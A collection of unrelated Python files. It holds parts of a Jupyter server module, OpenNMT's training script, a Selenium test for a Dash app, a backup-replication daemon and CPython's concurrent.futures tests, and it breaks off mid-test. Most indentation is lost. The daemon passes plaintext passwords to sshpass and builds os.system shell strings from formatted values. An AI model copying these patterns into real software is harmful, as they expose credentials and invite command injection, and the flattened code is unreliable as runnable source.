if re.match('nbserver-(.+).json', file_name):
with io.open(os.path.join(runtime_dir, file_name), encoding='utf-8') as f:
info = json.load(f)
# Simple check whether that process is really still running
# Also remove leftover files from IPython 2.x without a pid field
if ('pid' in info) and check_pid(info['pid']):
yield info
else:
# If the process has died, try to delete its info file
try:
os.unlink(os.path.join(runtime_dir, file_name))
except OSError:
pass # TODO: This should warn or log or something
#-----------------------------------------------------------------------------
# Main entry point
#-----------------------------------------------------------------------------
main = launch_new_instance = NotebookApp.launch_instance
|
train.py
|
#!/usr/bin/env python
"""Train models."""
import os
import signal
import torch
import onmt.opts as opts
import onmt.utils.distributed
from onmt.utils.misc import set_random_seed
from onmt.utils.logging import init_logger, logger
from onmt.train_single import main as single_main
from onmt.utils.parse import ArgumentParser
from onmt.inputters.inputter import build_dataset_iter, patch_fields, \
load_old_vocab, old_style_vocab, build_dataset_iter_multiple
from itertools import cycle
def train(opt):
ArgumentParser.validate_train_opts(opt)
ArgumentParser.update_model_opts(opt)
ArgumentParser.validate_model_opts(opt)
logger = init_logger(opt.log_file)
set_random_seed(opt.seed, False)
logger.info("The Input Parameters:")
for key, val in vars(opt).items():
logger.info(f"[Config]: {key} => {val}")
# Load checkpoint if we resume from a previous training.
if opt.train_from:
logger.info('Loading checkpoint from %s' % opt.train_from)
checkpoint = torch.load(opt.train_from,
map_location=lambda storage, loc: storage)
logger.info('Loading vocab from checkpoint at %s.' % opt.train_from)
vocab = checkpoint['vocab']
else:
vocab = torch.load(opt.data + '.vocab.pt')
# check for code where vocab is saved instead of fields
# (in the future this will be done in a smarter way)
if old_style_vocab(vocab):
fields = load_old_vocab(
vocab, opt.model_type, dynamic_dict=opt.copy_attn)
else:
fields = vocab
# patch for fields that may be missing in old data/model
patch_fields(opt, fields)
if len(opt.data_ids) > 1:
train_shards = []
for train_id in opt.data_ids:
shard_base = "train_" + train_id
train_shards.append(shard_base)
train_iter = build_dataset_iter_multiple(train_shards, fields, opt)
else:
if opt.data_ids[0] is not None:
shard_base = "train_" + opt.data_ids[0]
else:
shard_base = "train"
train_iter = build_dataset_iter(shard_base, fields, opt)
nb_gpu = len(opt.gpu_ranks)
if opt.world_size > 1:
queues = []
mp = torch.multiprocessing.get_context('spawn')
semaphore = mp.Semaphore(opt.world_size * opt.queue_size)
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for device_id in range(nb_gpu):
q = mp.Queue(opt.queue_size)
queues += [q]
procs.append(mp.Process(target=run, args=(
opt, device_id, error_queue, q, semaphore), daemon=True))
procs[device_id].start()
logger.info(" Starting process pid: %d " % procs[device_id].pid)
error_handler.add_child(procs[device_id].pid)
producer = mp.Process(target=batch_producer,
args=(train_iter, queues, semaphore, opt,),
daemon=True)
producer.start()
error_handler.add_child(producer.pid)
for p in procs:
p.join()
producer.terminate()
elif nb_gpu == 1: # case 1 GPU only
single_main(opt, 0)
else: # case only CPU
single_main(opt, -1)
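# Explanatory note (comment only, not part of the original script): in the multi-GPU branch
# above, one `run` process per GPU consumes batches from its own queue while a single
# `batch_producer` process fills the queues round-robin; the semaphore (world_size *
# queue_size slots) bounds how far the producer can run ahead of the consumers.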
def batch_producer(generator_to_serve, queues, semaphore, opt):
init_logger(opt.log_file)
set_random_seed(opt.seed, False)
# generator_to_serve = iter(generator_to_serve)
def pred(x):
"""
Filters batches that belong only
to gpu_ranks of current node
"""
for rank in opt.gpu_ranks:
if x[0] % opt.world_size == rank:
return True
generator_to_serve = filter(
pred, enumerate(generator_to_serve))
def next_batch(device_id):
new_batch = next(generator_to_serve)
semaphore.acquire()
return new_batch[1]
b = next_batch(0)
for device_id, q in cycle(enumerate(queues)):
b.dataset = None
if isinstance(b.src, tuple):
b.src = tuple([_.to(torch.device(device_id))
for _ in b.src])
else:
b.src = b.src.to(torch.device(device_id))
if hasattr(b, "src_path"):
if isinstance(b.src_path, tuple):
b.src_path = tuple([_.to(torch.device(device_id))
for _ in b.src_path])
else:
b.src_path = b.src_path.to(torch.device(device_id))
if hasattr(b, "tgt_path"):
if isinstance(b.tgt_path, tuple):
b.tgt_path = tuple([_.to(torch.device(device_id))
for _ in b.tgt_path])
else:
b.tgt_path = b.tgt_path.to(torch.device(device_id))
b.tgt = b.tgt.to(torch.device(device_id))
b.indices = b.indices.to(torch.device(device_id))
b.alignment = b.alignment.to(torch.device(device_id)) \
if hasattr(b, 'alignment') else None
b.src_map = b.src_map.to(torch.device(device_id)) \
if hasattr(b, 'src_map') else None
b.align = b.align.to(torch.device(device_id)) \
if hasattr(b, 'align') else None
b.corpus_id = b.corpus_id.to(torch.device(device_id)) \
if hasattr(b, 'corpus_id') else None
# hack to dodge unpicklable `dict_keys`
b.fields = list(b.fields)
q.put(b)
b = next_batch(device_id)
def run(opt, device_id, error_queue, batch_queue, semaphore):
""" run process """
try:
gpu_rank = onmt.utils.distributed.multi_init(opt, device_id)
if gpu_rank != opt.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
single_main(opt, device_id, batch_queue, semaphore)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((opt.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
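# --- Illustrative sketch (not part of the training code above) -------------
# ErrorHandler implements a common pattern: each child wraps its work in
# try/except, pushes (rank, formatted traceback) onto a queue on failure,
# and the parent surfaces the child's traceback in its own exception. A
# minimal stand-alone version (hypothetical `_demo_*` names, no signals):
def _demo_failing_child(rank, error_queue):
    import traceback
    try:
        raise RuntimeError("boom in child %d" % rank)
    except Exception:
        error_queue.put((rank, traceback.format_exc()))

def _demo_error_propagation():
    import multiprocessing
    ctx = multiprocessing.get_context('spawn')
    error_queue = ctx.SimpleQueue()
    p = ctx.Process(target=_demo_failing_child, args=(0, error_queue))
    p.start()
    p.join()
    if not error_queue.empty():
        rank, child_tb = error_queue.get()
        # Re-raise in the parent with the child's traceback attached,
        # which is essentially what ErrorHandler.signal_handler does.
        raise RuntimeError("child %d failed:\n%s" % (rank, child_tb))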
def _get_parser():
    parser = ArgumentParser(description='train.py')
opts.config_opts(parser)
opts.model_opts(parser)
opts.train_opts(parser)
return parser
def main():
parser = _get_parser()
opt = parser.parse_args()
train(opt)
if __name__ == "__main__":
main()
|
IntegrationTests.py
|
from __future__ import absolute_import
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import importlib
import multiprocessing
import percy
import time
import unittest
class IntegrationTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(IntegrationTests, cls).setUpClass()
cls.driver = webdriver.Chrome()
loader = percy.ResourceLoader(webdriver=cls.driver)
cls.percy_runner = percy.Runner(loader=loader)
cls.percy_runner.initialize_build()
@classmethod
def tearDownClass(cls):
super(IntegrationTests, cls).tearDownClass()
cls.driver.quit()
cls.percy_runner.finalize_build()
def setUp(self):
pass
def tearDown(self):
time.sleep(3)
self.server_process.terminate()
time.sleep(3)
def startServer(self, app):
def run():
app.scripts.config.serve_locally = True
app.css.config.serve_locally = True
app.run_server(
port=8050,
debug=False,
processes=4
)
# Run on a separate process so that it doesn't block
self.server_process = multiprocessing.Process(target=run)
self.server_process.start()
time.sleep(5)
# Visit the dash page
self.driver.get('http://localhost:8050')
time.sleep(0.5)
# Inject an error and warning logger
logger = '''
window.tests = {};
window.tests.console = {error: [], warn: [], log: []};
var _log = console.log;
var _warn = console.warn;
var _error = console.error;
console.log = function() {
window.tests.console.log.push({method: 'log', arguments: arguments});
return _log.apply(console, arguments);
};
console.warn = function() {
window.tests.console.warn.push({method: 'warn', arguments: arguments});
return _warn.apply(console, arguments);
};
console.error = function() {
window.tests.console.error.push({method: 'error', arguments: arguments});
return _error.apply(console, arguments);
};
'''
self.driver.execute_script(logger)
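# --- Illustrative sketch (not part of the test class above) ----------------
# The console shim injected by startServer() records every console.error /
# console.warn / console.log call in window.tests.console. A test could read
# the captured entries back through execute_script, for example with a
# helper like this (hypothetical, not used by the tests above):
def console_entry_count(driver, level='error'):
    """Number of captured console calls for one level ('error', 'warn' or 'log')."""
    return driver.execute_script(
        'return window.tests.console[arguments[0]].length;', level)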
|
daemon_repl.py
|
import os
import threading
import logging
import time
log_filename = os.path.join('logs', 'repl.log')
logging.basicConfig(filename=log_filename, filemode='a', level=logging.DEBUG,
                    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger('daemon_repl.py')
class Backup_Data:
def __init__(self):
self.slavenum = "Slave1"
self.dbfile = "MugenDBfile.txt"
self.backupfile = "Backup_MugenDBfile.txt"
self.backuppatch = "Backup_MugenDBfile.patch"
self.keymapfile = "KeyMap.txt"
self.keymapbackup = "Backup_KeyMap.txt"
self.keymappatch = "Backup_KeyMap.patch"
self.replpass = list()
with open("config/password.txt",'r') as fin:
for line in fin:
self.replpass.append(line.strip().split("="))
def backup(self):
''' Creates threads and does scp for data replication to nodes'''
        if not os.path.isfile(self.backupfile):
            open(self.backupfile, "w").close()
        os.system("diff -u {0} {1} > {2}".format(self.backupfile, self.dbfile, self.backuppatch))
        if not os.path.isfile(self.keymapbackup):
            open(self.keymapbackup, "w").close()
        os.system("diff -u {0} {1} > {2}".format(self.keymapbackup, self.keymapfile, self.keymappatch))
os.system("sshpass -p '{0}' scp {1} spulima@{2}:/home/spulima/backup".format(self.replpass[0][2],self.keymappatch,self.replpass[0][1]))
os.system("patch {0} {1}".format(self.keymapbackup,self.keymappatch))
os.system("rm {}".format(self.keymappatch))
t1 = threading.Thread(target=self.repl,args=(self.replpass[0],))
t2 = threading.Thread(target=self.repl,args=(self.replpass[1],))
t3 = threading.Thread(target=self.repl,args=(self.replpass[2],))
t1.start()
t2.start()
t3.start()
t1.join()
t2.join()
t3.join()
os.system("patch {0} {1}".format(self.backupfile,self.backuppatch))
os.system("rm {}".format(self.backuppatch))
return 0
def repl(self,repl):
logger.debug("replicating on {0}@{1}".format(self.slavenum,repl[1]))
os.system("cp Backup_MugenDBfile.patch Backup_MugenDBfile_{}.patch".format(self.slavenum))
os.system("sshpass -p '{0}' scp Backup_MugenDBfile_{1}.patch spulima@{2}:/home/spulima/backup".format(repl[2],self.slavenum,repl[1]))
logger.debug("replicated on {0}@{1}".format(self.slavenum,repl[1]))
os.system("rm Backup_MugenDBfile_{}.patch".format(self.slavenum))
    def repl_neighbor(self):
        ''' Applies any patches pushed into the backup directory by the two neighboring slaves '''
        for neighbor in (self.replpass[3], self.replpass[4]):
            filename = "/home/spulima/backup/Backup_MugenDBfile_{0}.patch".format(neighbor[0])
            if os.path.isfile(filename):
                dbcopy = "MugenDBfile_{0}.txt".format(neighbor[0])
                if not os.path.isfile(dbcopy):
                    open(dbcopy, "w").close()
                logger.debug("patching file on {0}@{1}".format(neighbor[0], neighbor[1]))
                os.system("patch {0} {1}".format(dbcopy, filename))
                logger.debug("patched file on {0}@{1}".format(neighbor[0], neighbor[1]))
                os.system("rm {}".format(filename))
if __name__ == "__main__":
bkp = Backup_Data()
while(1):
bkp.backup()
bkp.repl_neighbor()
time.sleep(1)
|
test_concurrent_futures.py
|
import test.support
# Skip tests if _multiprocessing wasn't built.
test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
from test.support.script_helper import assert_python_ok
import contextlib
import itertools
import logging
from logging.handlers import QueueHandler
import os
import queue
import sys
import threading
import time
import unittest
import weakref
from pickle import PicklingError
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future,
BrokenExecutor)
from concurrent.futures.process import BrokenProcessPool
from multiprocessing import get_context
import multiprocessing.process
import multiprocessing.util
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
INITIALIZER_STATUS = 'uninitialized'
def mul(x, y):
return x * y
def capture(*args, **kwargs):
return args, kwargs
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
def init(x):
global INITIALIZER_STATUS
INITIALIZER_STATUS = x
def get_init_status():
return INITIALIZER_STATUS
def init_fail(log_queue=None):
if log_queue is not None:
logger = logging.getLogger('concurrent.futures')
logger.addHandler(QueueHandler(log_queue))
logger.setLevel('CRITICAL')
logger.propagate = False
time.sleep(0.1) # let some futures be scheduled
raise ValueError('error in initializer')
class MyObject(object):
def my_method(self):
pass
class EventfulGCObj():
def __init__(self, ctx):
mgr = get_context(ctx).Manager()
self.event = mgr.Event()
def __del__(self):
self.event.set()
def make_dummy_object(_):
return MyObject()
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._thread_key = test.support.threading_setup()
def tearDown(self):
test.support.reap_children()
test.support.threading_cleanup(*self._thread_key)
class ExecutorMixin:
worker_count = 5
executor_kwargs = {}
def setUp(self):
super().setUp()
self.t1 = time.monotonic()
if hasattr(self, "ctx"):
self.executor = self.executor_type(
max_workers=self.worker_count,
mp_context=self.get_context(),
**self.executor_kwargs)
else:
self.executor = self.executor_type(
max_workers=self.worker_count,
**self.executor_kwargs)
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
self.executor = None
dt = time.monotonic() - self.t1
if test.support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 300, "synchronization issue: test lasted too long")
super().tearDown()
def get_context(self):
return get_context(self.ctx)
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolForkMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "fork"
def get_context(self):
if sys.platform == "win32":
self.skipTest("require unix system")
return super().get_context()
class ProcessPoolSpawnMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "spawn"
class ProcessPoolForkserverMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "forkserver"
def get_context(self):
if sys.platform == "win32":
self.skipTest("require unix system")
return super().get_context()
def create_executor_tests(mixin, bases=(BaseTestCase,),
executor_mixins=(ThreadPoolMixin,
ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin)):
def strip_mixin(name):
if name.endswith(('Mixin', 'Tests')):
return name[:-5]
elif name.endswith('Test'):
return name[:-4]
else:
return name
for exe in executor_mixins:
name = ("%s%sTest"
% (strip_mixin(exe.__name__), strip_mixin(mixin.__name__)))
cls = type(name, (mixin,) + (exe,) + bases, {})
globals()[name] = cls
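# --- Illustrative sketch (not part of the test suite above) -----------------
# create_executor_tests() builds one concrete TestCase per executor flavour
# by composing mixins with the three-argument type() call. For example,
# create_executor_tests(InitializerMixin) registers ThreadPoolInitializerTest,
# ProcessPoolForkInitializerTest, ProcessPoolForkserverInitializerTest and
# ProcessPoolSpawnInitializerTest in this module's globals(). The same
# type()-based composition in isolation (toy names):
def _demo_dynamic_class():
    class Base:
        greeting = "hello"
    class Mixin:
        def shout(self):
            return self.greeting.upper()
    Demo = type("DemoShouter", (Mixin, Base), {})
    return Demo().shout()    # -> "HELLO"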
class InitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
global INITIALIZER_STATUS
INITIALIZER_STATUS = 'uninitialized'
self.executor_kwargs = dict(initializer=init,
initargs=('initialized',))
super().setUp()
def test_initializer(self):
futures = [self.executor.submit(get_init_status)
for _ in range(self.worker_count)]
for f in futures:
self.assertEqual(f.result(), 'initialized')
class FailingInitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
if hasattr(self, "ctx"):
# Pass a queue to redirect the child's logging output
self.mp_context = self.get_context()
self.log_queue = self.mp_context.Queue()
self.executor_kwargs = dict(initializer=init_fail,
initargs=(self.log_queue,))
else:
# In a thread pool, the child shares our logging setup
# (see _assert_logged())
self.mp_context = None
self.log_queue = None
self.executor_kwargs = dict(initializer=init_fail)
super().setUp()
def test_initializer(self):
with self._assert_logged('ValueError: error in initializer'):
try:
future = self.executor.submit(get_init_status)
except BrokenExecutor:
# Perhaps the executor is already broken
pass
else:
with self.assertRaises(BrokenExecutor):
future.result()
# At some point, the executor should break
t1 = time.monotonic()
while not self.executor._broken:
if time.monotonic() - t1 > 5:
self.fail("executor not broken after 5 s.")
time.sleep(0.01)
# ... and from this point submit() is guaranteed to fail
with self.assertRaises(BrokenExecutor):
self.executor.submit(get_init_status)
def _prime_executor(self):
pass
@contextlib.contextmanager
def _assert_logged(self, msg):
if self.log_queue is not None:
yield
output = []
try:
while True:
output.append(self.log_queue.get_nowait().getMessage())
except queue.Empty:
pass
else:
with self.assertLogs('concurrent.futures', 'CRITICAL') as cm:
yield
output = cm.output
self.assertTrue(any(msg in line for line in output),
output)
create_executor_tests(InitializerMixin)
create_executor_tests(FailingInitializerMixin)
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
if __name__ == "__main__":
context = '{context}'
if context == "":
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_submit_after_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
import atexit
@atexit.register
def run_last():
try:
t.submit(id, None)
except RuntimeError:
print("runtime-error")
raise
from concurrent.futures import {executor_type}
if __name__ == "__main__":
context = '{context}'
if not context:
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(id, 42).result()
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertIn("RuntimeError: cannot schedule new futures", err.decode())
self.assertEqual(out.strip(), b"runtime-error")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, BaseTestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(3):
self.executor.submit(acquire_lock, sem)
self.assertEqual(len(self.executor._threads), 3)
for i in range(3):
sem.release()
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
self.assertRegex(t.name, r'^SpecialPool_[0-4]$')
t.join()
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join()
class ProcessPoolShutdownTest(ExecutorShutdownTest):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
call_queue = executor._call_queue
queue_management_thread = executor._queue_management_thread
del executor
# Make sure that all the executor resources were properly cleaned by
# the shutdown process
queue_management_thread.join()
for p in processes.values():
p.join()
call_queue.join_thread()
create_executor_tests(ProcessPoolShutdownTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
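# --- Illustrative sketch (not part of the test suite above) -----------------
# The shutdown tests are run once per start method (fork, forkserver, spawn)
# via the executor mixins. Outside the test harness, the equivalent executor
# setup looks like this (a sketch, not exercised by the tests):
def _demo_executor_with_context(start_method="spawn"):
    pool = futures.ProcessPoolExecutor(
        max_workers=2, mp_context=get_context(start_method))
    with pool:                     # __exit__ calls shutdown(wait=True)
        squares = list(pool.map(pow, range(5), [2] * 5))
    return squares                 # [0, 1, 4, 9, 16]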
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, BaseTestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setswitchinterval(oldswitchinterval)
create_executor_tests(WaitTests,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
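# --- Illustrative sketch (not part of the test suite above) -----------------
# futures.wait() partitions the given futures into (done, not_done) sets
# according to return_when. A compact stand-alone illustration with a thread
# pool (a sketch, not exercised by the tests):
def _demo_wait_first_completed():
    with futures.ThreadPoolExecutor(max_workers=2) as pool:
        fast = pool.submit(pow, 2, 8)
        slow = pool.submit(time.sleep, 1)
        done, not_done = futures.wait(
            [fast, slow], return_when=futures.FIRST_COMPLETED)
    # Normally `fast` finishes first and lands in `done`, while `slow` is
    # still pending when wait() returns.
    return fast in done, slow in not_done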
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
# Issue #31641: accept arbitrary iterables.
future1 = self.executor.submit(time.sleep, 2)
completed = [
f for f in futures.as_completed(itertools.repeat(future1, 3))
]
self.assertEqual(len(completed), 1)
def test_free_reference_yielded_future(self):
# Issue #14406: Generator should not keep references
# to finished futures.
futures_list = [Future() for _ in range(8)]
futures_list.append(create_future(state=CANCELLED_AND_NOTIFIED))
futures_list.append(create_future(state=FINISHED, result=42))
with self.assertRaises(futures.TimeoutError):
for future in futures.as_completed(futures_list, timeout=0):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
futures_list[0].set_result("test")
for future in futures.as_completed(futures_list):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
if futures_list:
futures_list[0].set_result("test")
def test_correct_timeout_exception_msg(self):
futures_list = [CANCELLED_AND_NOTIFIED_FUTURE, PENDING_FUTURE,
RUNNING_FUTURE, SUCCESSFUL_FUTURE]
with self.assertRaises(futures.TimeoutError) as cm:
list(futures.as_completed(futures_list, timeout=0))
self.assertEqual(str(cm.exception), '2 (of 4) futures unfinished')
create_executor_tests(AsCompletedTests)
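# --- Illustrative sketch (not part of the test suite above) -----------------
# futures.as_completed() yields futures in the order they finish, not the
# order they were submitted. A stand-alone sketch (not exercised by the
# tests):
def _demo_as_completed_ordering():
    with futures.ThreadPoolExecutor(max_workers=2) as pool:
        slow = pool.submit(time.sleep, 0.2)
        fast = pool.submit(pow, 3, 4)
        finished_order = list(futures.as_completed([slow, fast]))
    # Normally `fast` is yielded first even though `slow` was submitted first.
    return finished_order[0] is fast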
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
future = self.executor.submit(capture, 1, self=2, fn=3)
self.assertEqual(future.result(), ((1,), {'self': 2, 'fn': 3}))
with self.assertWarns(DeprecationWarning):
